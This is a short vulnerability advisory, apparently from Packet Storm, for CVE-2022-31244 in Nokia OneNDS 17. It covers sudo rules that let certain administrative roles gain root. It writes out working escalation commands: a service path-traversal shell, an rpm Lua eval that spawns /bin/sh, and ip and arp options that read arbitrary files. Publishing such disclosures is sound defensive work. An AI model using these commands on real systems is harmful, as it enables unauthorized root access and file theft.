    ===============================================================================             title: Incorrect Permission Assignment           product: Nokia OneNDS 17vulnerability type: Security Misconfiguration          severity: High        CVSS Score: 7.8       CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H          found on: 31/03/2022                by: Giacomo Sighinolfi, Milena Mangiola,                     Savino Sisco, Valerio Casalino               cve: CVE-2022-31244===============================================================================Some sudo permissions can be exploited by the users that have specific rolesto escalate to root privileges and execute arbitrary commands on the system.The affected roles are:ONENDS_CC_BASIC_ADMIN:  - it can run /sbin/service  - can be exploited using `sudo /sbin/service ../../bin/sh`ONENDS_CC_SERVICE_ADMIN:  - it can run /bin/rpm  - can be exploited using `sudo /bin/rpm --eval '%{lua:os.execute("/bin/sh")}'`ONENDS_CC_NETWORK_MANAGEMENT:  - it can run /sbin/ip,/sbin/arp  - can be exploited using `sudo /sbin/ip -force -batch 'file_to_read'` - can be exploited using `sudo /sbin/arp -v -f 'file_to_read'`===============================================================================

Source

Packet Storm